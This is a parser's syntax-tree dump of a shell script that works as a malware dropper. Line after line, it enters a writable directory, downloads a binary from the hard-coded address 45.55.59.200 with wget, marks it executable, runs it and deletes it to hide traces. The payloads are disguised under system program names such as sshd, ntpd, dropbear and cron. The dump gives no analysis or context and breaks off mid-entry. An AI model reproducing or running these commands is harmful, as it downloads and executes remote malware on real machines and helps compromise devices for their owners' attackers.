ListNode(lineno=2, pos=(12, 132), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 96), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 96), word='http://45.55.59.200/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(96, 97)),
  CommandNode(lineno=2, pos=(98, 111), parts=[
    WordNode(lineno=2, pos=(98, 103), word='chmod'),
    WordNode(lineno=2, pos=(104, 106), word='+x'),
    WordNode(lineno=2, pos=(107, 111), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(111, 112)),
  CommandNode(lineno=2, pos=(113, 119), parts=[
    WordNode(lineno=2, pos=(113, 119), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(119, 120)),
  CommandNode(lineno=2, pos=(121, 132), parts=[
    WordNode(lineno=2, pos=(121, 123), word='rm'),
    WordNode(lineno=2, pos=(124, 127), word='-rf'),
    WordNode(lineno=2, pos=(128, 132), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(133, 253), parts=[
  CommandNode(lineno=3, pos=(133, 140), parts=[
    WordNode(lineno=3, pos=(133, 135), word='cd'),
    WordNode(lineno=3, pos=(136, 140), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(141, 143)),
  CommandNode(lineno=3, pos=(144, 155), parts=[
    WordNode(lineno=3, pos=(144, 146), word='cd'),
    WordNode(lineno=3, pos=(147, 155), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(156, 158)),
  CommandNode(lineno=3, pos=(159, 166), parts=[
    WordNode(lineno=3, pos=(159, 161), word='cd'),
    WordNode(lineno=3, pos=(162, 166), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(167, 169)),
  CommandNode(lineno=3, pos=(170, 178), parts=[
    WordNode(lineno=3, pos=(170, 172), word='cd'),
    WordNode(lineno=3, pos=(173, 178), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 186), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 186), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(186, 187)),
  CommandNode(lineno=3, pos=(188, 217), parts=[
    WordNode(lineno=3, pos=(188, 192), word='wget'),
    WordNode(lineno=3, pos=(193, 217), word='http://45.55.59.200/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(217, 218)),
  CommandNode(lineno=3, pos=(219, 232), parts=[
    WordNode(lineno=3, pos=(219, 224), word='chmod'),
    WordNode(lineno=3, pos=(225, 227), word='+x'),
    WordNode(lineno=3, pos=(228, 232), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(232, 233)),
  CommandNode(lineno=3, pos=(234, 240), parts=[
    WordNode(lineno=3, pos=(234, 240), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 253), parts=[
    WordNode(lineno=3, pos=(242, 244), word='rm'),
    WordNode(lineno=3, pos=(245, 248), word='-rf'),
    WordNode(lineno=3, pos=(249, 253), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(254, 386), parts=[
  CommandNode(lineno=4, pos=(254, 261), parts=[
    WordNode(lineno=4, pos=(254, 256), word='cd'),
    WordNode(lineno=4, pos=(257, 261), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(262, 264)),
  CommandNode(lineno=4, pos=(265, 276), parts=[
    WordNode(lineno=4, pos=(265, 267), word='cd'),
    WordNode(lineno=4, pos=(268, 276), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(277, 279)),
  CommandNode(lineno=4, pos=(280, 287), parts=[
    WordNode(lineno=4, pos=(280, 282), word='cd'),
    WordNode(lineno=4, pos=(283, 287), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(288, 290)),
  CommandNode(lineno=4, pos=(291, 299), parts=[
    WordNode(lineno=4, pos=(291, 293), word='cd'),
    WordNode(lineno=4, pos=(294, 299), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(300, 302)),
  CommandNode(lineno=4, pos=(303, 307), parts=[
    WordNode(lineno=4, pos=(303, 305), word='cd'),
    WordNode(lineno=4, pos=(306, 307), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(307, 308)),
  CommandNode(lineno=4, pos=(309, 341), parts=[
    WordNode(lineno=4, pos=(309, 313), word='wget'),
    WordNode(lineno=4, pos=(314, 341), word='http://45.55.59.200/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(341, 342)),
  CommandNode(lineno=4, pos=(343, 359), parts=[
    WordNode(lineno=4, pos=(343, 348), word='chmod'),
    WordNode(lineno=4, pos=(349, 351), word='+x'),
    WordNode(lineno=4, pos=(352, 359), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(359, 360)),
  CommandNode(lineno=4, pos=(361, 370), parts=[
    WordNode(lineno=4, pos=(361, 370), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(370, 371)),
  CommandNode(lineno=4, pos=(372, 386), parts=[
    WordNode(lineno=4, pos=(372, 374), word='rm'),
    WordNode(lineno=4, pos=(375, 378), word='-rf'),
    WordNode(lineno=4, pos=(379, 386), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(387, 507), parts=[
  CommandNode(lineno=5, pos=(387, 394), parts=[
    WordNode(lineno=5, pos=(387, 389), word='cd'),
    WordNode(lineno=5, pos=(390, 394), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(395, 397)),
  CommandNode(lineno=5, pos=(398, 409), parts=[
    WordNode(lineno=5, pos=(398, 400), word='cd'),
    WordNode(lineno=5, pos=(401, 409), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(410, 412)),
  CommandNode(lineno=5, pos=(413, 420), parts=[
    WordNode(lineno=5, pos=(413, 415), word='cd'),
    WordNode(lineno=5, pos=(416, 420), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(421, 423)),
  CommandNode(lineno=5, pos=(424, 432), parts=[
    WordNode(lineno=5, pos=(424, 426), word='cd'),
    WordNode(lineno=5, pos=(427, 432), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(433, 435)),
  CommandNode(lineno=5, pos=(436, 440), parts=[
    WordNode(lineno=5, pos=(436, 438), word='cd'),
    WordNode(lineno=5, pos=(439, 440), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(440, 441)),
  CommandNode(lineno=5, pos=(442, 471), parts=[
    WordNode(lineno=5, pos=(442, 446), word='wget'),
    WordNode(lineno=5, pos=(447, 471), word='http://45.55.59.200/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(471, 472)),
  CommandNode(lineno=5, pos=(473, 486), parts=[
    WordNode(lineno=5, pos=(473, 478), word='chmod'),
    WordNode(lineno=5, pos=(479, 481), word='+x'),
    WordNode(lineno=5, pos=(482, 486), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 494), parts=[
    WordNode(lineno=5, pos=(488, 494), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(494, 495)),
  CommandNode(lineno=5, pos=(496, 507), parts=[
    WordNode(lineno=5, pos=(496, 498), word='rm'),
    WordNode(lineno=5, pos=(499, 502), word='-rf'),
    WordNode(lineno=5, pos=(503, 507), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(508, 628), parts=[
  CommandNode(lineno=6, pos=(508, 515), parts=[
    WordNode(lineno=6, pos=(508, 510), word='cd'),
    WordNode(lineno=6, pos=(511, 515), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(516, 518)),
  CommandNode(lineno=6, pos=(519, 530), parts=[
    WordNode(lineno=6, pos=(519, 521), word='cd'),
    WordNode(lineno=6, pos=(522, 530), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(531, 533)),
  CommandNode(lineno=6, pos=(534, 541), parts=[
    WordNode(lineno=6, pos=(534, 536), word='cd'),
    WordNode(lineno=6, pos=(537, 541), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(542, 544)),
  CommandNode(lineno=6, pos=(545, 553), parts=[
    WordNode(lineno=6, pos=(545, 547), word='cd'),
    WordNode(lineno=6, pos=(548, 553), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(554, 556)),
  CommandNode(lineno=6, pos=(557, 561), parts=[
    WordNode(lineno=6, pos=(557, 559), word='cd'),
    WordNode(lineno=6, pos=(560, 561), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(561, 562)),
  CommandNode(lineno=6, pos=(563, 592), parts=[
    WordNode(lineno=6, pos=(563, 567), word='wget'),
    WordNode(lineno=6, pos=(568, 592), word='http://45.55.59.200/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(592, 593)),
  CommandNode(lineno=6, pos=(594, 607), parts=[
    WordNode(lineno=6, pos=(594, 599), word='chmod'),
    WordNode(lineno=6, pos=(600, 602), word='+x'),
    WordNode(lineno=6, pos=(603, 607), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(607, 608)),
  CommandNode(lineno=6, pos=(609, 615), parts=[
    WordNode(lineno=6, pos=(609, 615), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(615, 616)),
  CommandNode(lineno=6, pos=(617, 628), parts=[
    WordNode(lineno=6, pos=(617, 619), word='rm'),
    WordNode(lineno=6, pos=(620, 623), word='-rf'),
    WordNode(lineno=6, pos=(624, 628), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(629, 757), parts=[
  CommandNode(lineno=7, pos=(629, 636), parts=[
    WordNode(lineno=7, pos=(629, 631), word='cd'),
    WordNode(lineno=7, pos=(632, 636), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(637, 639)),
  CommandNode(lineno=7, pos=(640, 651), parts=[
    WordNode(lineno=7, pos=(640, 642), word='cd'),
    WordNode(lineno=7, pos=(643, 651), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(652, 654)),
  CommandNode(lineno=7, pos=(655, 662), parts=[
    WordNode(lineno=7, pos=(655, 657), word='cd'),
    WordNode(lineno=7, pos=(658, 662), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(663, 665)),
  CommandNode(lineno=7, pos=(666, 674), parts=[
    WordNode(lineno=7, pos=(666, 668), word='cd'),
    WordNode(lineno=7, pos=(669, 674), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(675, 677)),
  CommandNode(lineno=7, pos=(678, 682), parts=[
    WordNode(lineno=7, pos=(678, 680), word='cd'),
    WordNode(lineno=7, pos=(681, 682), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(682, 683)),
  CommandNode(lineno=7, pos=(684, 715), parts=[
    WordNode(lineno=7, pos=(684, 688), word='wget'),
    WordNode(lineno=7, pos=(689, 715), word='http://45.55.59.200/pstree'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(715, 716)),
  CommandNode(lineno=7, pos=(717, 732), parts=[
    WordNode(lineno=7, pos=(717, 722), word='chmod'),
    WordNode(lineno=7, pos=(723, 725), word='+x'),
    WordNode(lineno=7, pos=(726, 732), word='pstree'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(732, 733)),
  CommandNode(lineno=7, pos=(734, 742), parts=[
    WordNode(lineno=7, pos=(734, 742), word='./pstree'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(742, 743)),
  CommandNode(lineno=7, pos=(744, 757), parts=[
    WordNode(lineno=7, pos=(744, 746), word='rm'),
    WordNode(lineno=7, pos=(747, 750), word='-rf'),
    WordNode(lineno=7, pos=(751, 757), word='pstree'),
  ]),
])
ListNode(lineno=8, pos=(758, 894), parts=[
  CommandNode(lineno=8, pos=(758, 765), parts=[
    WordNode(lineno=8, pos=(758, 760), word='cd'),
    WordNode(lineno=8, pos=(761, 765), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(766, 768)),
  CommandNode(lineno=8, pos=(769, 780), parts=[
    WordNode(lineno=8, pos=(769, 771), word='cd'),
    WordNode(lineno=8, pos=(772, 780), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(781, 783)),
  CommandNode(lineno=8, pos=(784, 791), parts=[
    WordNode(lineno=8, pos=(784, 786), word='cd'),
    WordNode(lineno=8, pos=(787, 791), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(792, 794)),
  CommandNode(lineno=8, pos=(795, 803), parts=[
    WordNode(lineno=8, pos=(795, 797), word='cd'),
    WordNode(lineno=8, pos=(798, 803), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(804, 806)),
  CommandNode(lineno=8, pos=(807, 811), parts=[
    WordNode(lineno=8, pos=(807, 809), word='cd'),
    WordNode(lineno=8, pos=(810, 811), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(811, 812)),
  CommandNode(lineno=8, pos=(813, 846), parts=[
    WordNode(lineno=8, pos=(813, 817), word='wget'),
    WordNode(lineno=8, pos=(818, 846), word='http://45.55.59.200/dropbear'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(846, 847)),
  CommandNode(lineno=8, pos=(848, 865), parts=[
    WordNode(lineno=8, pos=(848, 853), word='chmod'),
    WordNode(lineno=8, pos=(854, 856), word='+x'),
    WordNode(lineno=8, pos=(857, 865), word='dropbear'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(865, 866)),
  CommandNode(lineno=8, pos=(867, 877), parts=[
    WordNode(lineno=8, pos=(867, 877), word='./dropbear'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(877, 878)),
  CommandNode(lineno=8, pos=(879, 894), parts=[
    WordNode(lineno=8, pos=(879, 881), word='rm'),
    WordNode(lineno=8, pos=(882, 885), word='-rf'),
    WordNode(lineno=8, pos=(886, 894), word='dropbear'),
  ]),
])
ListNode(lineno=9, pos=(895, 1015), parts=[
  CommandNode(lineno=9, pos=(895, 902), parts=[
    WordNode(lineno=9, pos=(895, 897), word='cd'),
    WordNode(lineno=9, pos=(898, 902), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(903, 905)),
  CommandNode(lineno=9, pos=(906, 917), parts=[
    WordNode(lineno=9, pos=(906, 908), word='cd'),
    WordNode(lineno=9, pos=(909, 917), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(918, 920)),
  CommandNode(lineno=9, pos=(921, 928), parts=[
    WordNode(lineno=9, pos=(921, 923), word='cd'),
    WordNode(lineno=9, pos=(924, 928), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(929, 931)),
  CommandNode(lineno=9, pos=(932, 940), parts=[
    WordNode(lineno=9, pos=(932, 934), word='cd'),
    WordNode(lineno=9, pos=(935, 940), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(941, 943)),
  CommandNode(lineno=9, pos=(944, 948), parts=[
    WordNode(lineno=9, pos=(944, 946), word='cd'),
    WordNode(lineno=9, pos=(947, 948), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(948, 949)),
  CommandNode(lineno=9, pos=(950, 979), parts=[
    WordNode(lineno=9, pos=(950, 954), word='wget'),
    WordNode(lineno=9, pos=(955, 979), word='http://45.55.59.200/wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(979, 980)),
  CommandNode(lineno=9, pos=(981, 994), parts=[
    WordNode(lineno=9, pos=(981, 986), word='chmod'),
    WordNode(lineno=9, pos=(987, 989), word='+x'),
    WordNode(lineno=9, pos=(990, 994), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(994, 995)),
  CommandNode(lineno=9, pos=(996, 1002), parts=[
    WordNode(lineno=9, pos=(996, 1002), word='./wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1002, 1003)),
  CommandNode(lineno=9, pos=(1004, 1015), parts=[
    WordNode(lineno=9, pos=(1004, 1006), word='rm'),
    WordNode(lineno=9, pos=(1007, 1010), word='-rf'),
    WordNode(lineno=9, pos=(1011, 1015), word='wget'),
  ]),
])
ListNode(lineno=10, pos=(1016, 1136), parts=[
  CommandNode(lineno=10, pos=(1016, 1023), parts=[
    WordNode(lineno=10, pos=(1016, 1018), word='cd'),
    WordNode(lineno=10, pos=(1019, 1023), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1024, 1026)),
  CommandNode(lineno=10, pos=(1027, 1038), parts=[
    WordNode(lineno=10, pos=(1027, 1029), word='cd'),
    WordNode(lineno=10, pos=(1030, 1038), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1039, 1041)),
  CommandNode(lineno=10, pos=(1042, 1049), parts=[
    WordNode(lineno=10, pos=(1042, 1044), word='cd'),
    WordNode(lineno=10, pos=(1045, 1049), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1050, 1052)),
  CommandNode(lineno=10, pos=(1053, 1061), parts=[
    WordNode(lineno=10, pos=(1053, 1055), word='cd'),
    WordNode(lineno=10, pos=(1056, 1061), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1062, 1064)),
  CommandNode(lineno=10, pos=(1065, 1069), parts=[
    WordNode(lineno=10, pos=(1065, 1067), word='cd'),
    WordNode(lineno=10, pos=(1068, 1069), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1069, 1070)),
  CommandNode(lineno=10, pos=(1071, 1100), parts=[
    WordNode(lineno=10, pos=(1071, 1075), word='wget'),
    WordNode(lineno=10, pos=(1076, 1100), word='http://45.55.59.200/cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1100, 1101)),
  CommandNode(lineno=10, pos=(1102, 1115), parts=[
    WordNode(lineno=10, pos=(1102, 1107), word='chmod'),
    WordNode(lineno=10, pos=(1108, 1110), word='+x'),
    WordNode(lineno=10, pos=(1111, 1115), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1115, 1116)),
  CommandNode(lineno=10, pos=(1117, 1123), parts=[
    WordNode(lineno=10, pos=(1117, 1123), word='./cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1123, 1124)),
  CommandNode(lineno=10, pos=(1125, 1136), parts=[
    WordNode(lineno=10, pos=(1125, 1127), word='rm'),
    WordNode(lineno=10, pos=(1128, 1131), word='-rf'),
    WordNode(lineno=10, pos=(1132, 1136), word='cron'),
  ]),
])
ListNode(lineno=11, pos=(1137, 1253), parts=[
  CommandNode(lineno=11, pos=(1137, 1144), parts=[
    WordNode(lineno=11, pos=(1137, 1139), word='cd'),
    WordNode(lineno=11, pos=(1140, 1144), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1145, 1147)),
  CommandNode(lineno=11, pos=(1148, 1159), parts=[
    WordNode(lineno=11, pos=(1148, 1150), word='cd'),
    WordNode(lineno=11, pos=(1151, 1159), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1160, 1162)),
  CommandNode(lineno=11, pos=(1163, 1170), parts=[
    WordNode(lineno=11, pos=(1163, 1165), word='cd'),
    WordNode(lineno=11, pos=(1166, 1170), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1171, 1173)),
  CommandNode(lineno=11, pos=(1174, 1182), parts=[
    WordNode(lineno=11, pos=(1174, 1176), word='cd'),
    WordNode(lineno=11, pos=(1177, 1182), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1183, 1185)),
  CommandNode(lineno=11, pos=(1186, 1190), parts=[
    WordNode(lineno=11, pos=(1186, 1188), word='cd'),
    WordNode(lineno=11, pos=(1189, 1190), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1190, 1191)),
  CommandNode(lineno=11, pos=(1192, 1220), parts=[
    WordNode(lineno=11, pos=(1192, 1196), word='wget'),
    WordNode(lineno=11, pos=(1197, 1220), word='http://45.55.59.200/ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1220, 1221)),
  CommandNode(lineno=11, pos=(1222, 1234), parts=[
    WordNode(lineno=11, pos=(1222, 1227), word='chmod'),
    WordNode(lineno=11, pos=(1228, 1230), word='+x'),
    WordNode(lineno=11, pos=(1231, 1234), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1234, 1235)),
  CommandNode(lineno=11, pos=(1236, 1241), parts=[
    WordNode(lineno=11, pos=(1236, 1241), word='./ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1241, 1242)),
  CommandNode(lineno=11, pos=(1243, 1253), parts=[
    WordNode(lineno=11, pos=(1243, 1245), word='rm'),
    WordNode(lineno=11, pos=(1246, 1249), word='-rf'),
    WordNode(lineno=11, pos=(1250, 1253), word='ftp'),
  ]),
])
ListNode(lineno=12, pos=(1254, 1374), parts=[
  CommandNode(lineno=12, pos=(1254, 1261), parts=[
    WordNode(lineno=12, pos=(1254, 1256), word='cd'),
    WordNode(lineno=12, pos=(1257, 1261), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1262, 1264)),
  CommandNode(lineno=12, pos=(1265, 1276), parts=[
    WordNode(lineno=12, pos=(1265, 1267), word='cd'),
    WordNode(lineno=12, pos=(1268, 1276), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1277, 1279)),
  CommandNode(lineno=12, pos=(1280, 1287), parts=[
    WordNode(lineno=12, pos=(1280, 1282), word='cd'),
    WordNode(lineno=12, pos=(1283, 1287), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1288, 1290)),
  CommandNode(lineno=12, pos=(1291, 1299), parts=[
    WordNode(lineno=12, pos=(1291, 1293), word='cd'),
    WordNode(lineno=12, pos=(1294, 1299), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1300, 1302)),
  CommandNode(lineno=12, pos=(1303, 1307), parts=[
    WordNode(lineno=12, pos=(1303, 1305), word='cd'),
    WordNode(lineno=12, pos=(1306, 1307), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1307, 1308)),
  CommandNode(lineno=12, pos=(1309, 1338), parts=[
    WordNode(lineno=12, pos=(1309, 1313), word='wget'),
    WordNode(lineno=12, pos=(1314, 1338), word='http://45.55.59.200/pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1338, 1339)),
  CommandNode(lineno=12, pos=(1340, 1353), parts=[
    WordNode(lineno=12, pos=(1340, 1345), word='chmod'),
    WordNode(lineno=12, pos=(1346, 1348), word='+x'),
    WordNode(lineno=12, pos=(1349, 1353), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1353, 1354)),
  CommandNode(lineno=12, pos=(1355, 1361), parts=[
    WordNode(lineno=12, pos=(1355, 1361), word='./pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1361, 1362)),
  CommandNode(lineno=12, pos=(1363, 1374), parts=[
    WordNode(lineno=12, pos=(1363, 1365), word='rm'),
    WordNode(lineno=12, pos=(1366, 1369), word='-rf'),
    WordNode(lineno=12, pos=(1370, 1374), word='pftp'),
  ]),
])
ListNode(lineno=13, pos=(1375, 1487), parts=[
  CommandNode(lineno=13, pos=(1375, 1382), parts=[
    WordNode(lineno=13, pos=(1375, 1377), word='cd'),
    WordNode(lineno=13, pos=(1378, 1382), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1383, 1385)),
  CommandNode(lineno=13, pos=(1386, 1397), parts=[
    WordNode(lineno=13, pos=(1386, 1388), word='cd'),
    WordNode(lineno=13, pos=(1389, 1397), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1398, 1400)),
  CommandNode(lineno=13, pos=(1401, 1408), parts=[
    WordNode(lineno=13, pos=(1401, 1403), word='cd'),
    WordNode(lineno=13, pos=(1404, 1408), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1409, 1411)),
  CommandNode(lineno=13, pos=(1412, 1420), parts=[
    WordNode(lineno=13, pos=(1412, 1414), word='cd'),
    WordNode(lineno=13, pos=(1415, 1420), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1421, 1423)),
  CommandNode(lineno=13, pos=(1424, 1428), parts=[
    WordNode(lineno=13, pos=(1424, 1426), word='cd'),
    WordNode(lineno=13, pos=(1427, 1428), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1428, 1429)),
  CommandNode(lineno=13, pos=(1430, 1457), parts=[
    WordNode(lineno=13, pos=(1430, 1434), word='wget'),
    WordNode(lineno=13, pos=(1435, 1457), word='http://45.55.59.200/sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1457, 1458)),
  CommandNode(lineno=13, pos=(1459, 1470), parts=[
    WordNode(lineno=13, pos=(1459, 1464), word='chmod'),
    WordNode(lineno=13, pos=(1465, 1467), word='+x'),
    WordNode(lineno=13, pos=(1468, 1470), word='sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1470, 1471)),
  CommandNode(lineno=13, pos=(1472, 1476), parts=[
    WordNode(lineno=13, pos=(1472, 1476), word='./sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1476, 1477)),
  CommandNode(lineno=13, pos=(1478, 1487), parts=[
    WordNode(lineno=13, pos=(1478, 1480), word='rm'),
    WordNode(lineno=13, pos=(1481, 1484), word='-rf'),
    WordNode(lineno=13, pos=(1485, 1487), word='sh'),
  ]),
])
ListNode(lineno=14, pos=(1488, 1604), parts=[
  CommandNode(lineno=14, pos=(1488, 1495), parts=[
    WordNode(lineno=14, pos=(1488, 1490), word='cd'),
    WordNode(lineno=14, pos=(1491, 1495), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1496, 1498)),
  CommandNode(lineno=14, pos=(1499, 1510), parts=[
    WordNode(lineno=14, pos=(1499, 1501), word='cd'),
    WordNode(lineno=14, pos=(1502, 1510), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1511, 1513)),
  CommandNode(lineno=14, pos=(1514, 1521), parts=[
    WordNode(lineno=14, pos=(1514, 1516), word='cd'),
    WordNode(lineno=14, pos=(1517, 1521), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1522, 1524)),
  CommandNode(lineno=14, pos=(1525, 1533), parts=[
    WordNode(lineno=14, pos=(1525, 1527), word='cd'),
    WordNode(lineno=14, pos=(1528, 1533), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1534, 1536)),
  CommandNode(lineno=14, pos=(1537, 1541), parts=[
    WordNode(lineno=14, pos=(1537, 1539), word='cd'),
    WordNode(lineno=14, pos=(1540, 1541), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1541, 1542)),
  CommandNode(lineno=14, pos=(1543, 1571), parts=[
    WordNode(lineno=14, pos=(1543, 1547), word='wget'),
    WordNode(lineno=14, pos=(1548, 1571), word='http://45.55.59.200/ '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1571, 1572)),
  CommandNode(lineno=14, pos=(1573, 1585), parts=[
    WordNode(lineno=14, pos=(1573, 1578), word='chmod'),
    WordNode(lineno=14, pos=(1579, 1581), word='+x'),
    WordNode(lineno=14, pos=(1582, 1585), word=' '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1585, 1586)),
  CommandNode(lineno=14, pos=(1587, 1592), parts=[
    WordNode(lineno=14, pos=(1587, 1592), word='./ '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1592, 1593)),
  CommandNode(lineno=14, pos=(1594, 1604), parts=[
    WordNode(lineno=14, pos=(1594, 1596), word='rm'),
    WordNode(lineno=14, pos=(1597, 1600), word='-rf'),
    WordNode(lineno=14, pos=(1601, 1604), word=' '),
  ]),
])
ListNode(lineno=15, pos=(1605, 1737), parts=[
  CommandNode(lineno=15, pos=(1605, 1612), parts=[
    WordNode(lineno=15, pos=(1605, 1607), word='cd'),
    WordNode(lineno=15, pos=(1608, 1612), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1613, 1615)),
  CommandNode(lineno=15, pos=(1616, 1627), parts=[
    WordNode(lineno=15, pos=(1616, 1618), word='cd'),
    WordNode(lineno=15, pos=(1619, 1627), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1628, 1630)),
  CommandNode(lineno=15, pos=(1631, 1638), parts=[
